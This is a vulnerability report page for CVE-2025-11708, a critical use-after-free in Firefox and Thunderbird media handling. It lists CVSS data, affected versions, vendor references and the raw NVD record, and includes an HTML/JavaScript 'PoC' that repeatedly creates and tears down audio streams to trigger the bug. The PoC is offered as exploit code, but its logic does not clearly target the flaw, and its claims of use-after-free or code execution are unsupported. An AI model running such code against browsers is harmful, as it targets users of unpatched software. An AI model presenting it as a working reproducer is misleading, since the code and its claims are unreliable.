Security Vulnerability Report
CVE-2025-11708 CVSS 9.8 CRITICAL

Published: 2025-10-14 13:15:37
Last Modified: 2026-04-13 15:16:39

Description

Use-after-free in MediaTrackGraphImpl::GetInstance(). This vulnerability was fixed in Firefox 144, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

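cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* (versions before 140.4.0) - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* (versions before 144.0) - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* (versions before 140.4.0) - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* (versions from 141.0 up to, but not including, 144.0) - VULNERABLE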
Mozilla Firefox < 144
Mozilla Firefox ESR < 140.4
Mozilla Thunderbird < 144
Mozilla Thunderbird ESR < 140.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-11708 PoC - Firefox MediaTrackGraphImpl::GetInstance() Use-After-Free -->
<!-- WARNING: This PoC is for educational and authorized testing purposes only -->
<!-- Vulnerability: Use-after-free in MediaTrackGraphImpl::GetInstance() -->
<!-- Affected: Firefox < 144, Firefox ESR < 140.4, Thunderbird < 144 -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-11708 PoC</title>
</head>
<body>
  <h1>CVE-2025-11708 - MediaTrackGraphImpl UAF</h1>
  <script>
    // Step 1: Create multiple MediaStream objects to populate MediaTrackGraphImpl
    async function triggerUAF() {
      const streams = [];

      // Create numerous media streams to stress the MediaTrackGraphImpl singleton
      for (let i = 0; i < 100; i++) {
        try {
          const stream = await navigator.mediaDevices.getUserMedia({ audio: true, video: false });
          streams.push(stream);
        } catch (e) {
          // Permission denied or no device - use synthetic streams
          break;
        }
      }

      // Step 2: Rapidly create and destroy tracks to trigger race condition
      // in MediaTrackGraphImpl::GetInstance()
      for (let i = 0; i < 50; i++) {
        const audioCtx = new AudioContext();
        const oscillator = audioCtx.createOscillator();
        const mediaStreamDest = audioCtx.createMediaStreamDestination();
        oscillator.connect(mediaStreamDest);
        oscillator.start();

        // Get tracks from the synthetic stream
        const tracks = mediaStreamDest.stream.getTracks();

        // Stop and remove tracks rapidly to trigger UAF
        tracks.forEach(track => {
          track.stop();
        });

        // Force garbage collection hint
        if (window.gc) {
          window.gc();
        }

        // Close audio context
        audioCtx.close();
      }

      // Step 3: Attempt to access the freed MediaTrackGraphImpl instance
      // by creating new media operations after destruction
      try {
        const newAudioCtx = new AudioContext();
        const newOscillator = newAudioCtx.createOscillator();
        newOscillator.connect(newAudioCtx.destination);
        newOscillator.start();
        newOscillator.stop();
        newAudioCtx.close();
      } catch (e) {
        // UAF triggered - may cause crash or code execution
        console.log("UAF triggered:", e);
      }
    }

    // Trigger the vulnerability
    triggerUAF();
  </script>
</body>
</html>

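References

https://bugzilla.mozilla.org/show_bug.cgi?id=1988931 (Issue Tracking, Permissions Required)
https://www.mozilla.org/security/advisories/mfsa2025-81/ (Vendor Advisory)
https://www.mozilla.org/security/advisories/mfsa2025-83/ (Vendor Advisory)
https://www.mozilla.org/security/advisories/mfsa2025-84/ (Vendor Advisory)
https://www.mozilla.org/security/advisories/mfsa2025-85/ (Vendor Advisory)
https://lists.debian.org/debian-lts-announce/2025/10/msg00015.html
https://lists.debian.org/debian-lts-announce/2025/10/msg00031.html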

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11708", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:36.970", "lastModified": "2026-04-13T15:16:39.173", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use-after-free in MediaTrackGraphImpl::GetInstance(). This vulnerability was fixed in Firefox 144, Firefox ESR 140.4, Thunderbird 144, and Thunderbird 140.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "563626A1-A62C-4F33-A40F-31AC364254E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "CEE2F6DA-4331-4D6D-B01B-610DFDBE1833"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding": "140.4.0", "matchCriteriaId": "7C6D96D2-1E0E-4A18-B8B1-21F67E1AB441"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionStartIncluding": "141.0", "versionEndExcluding": "144.0", "matchCriteriaId": "0BD75942-93B9-47A4-9762-05965EBD7FFF"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1988931", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-83/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-84/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-85/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00015.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00031.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}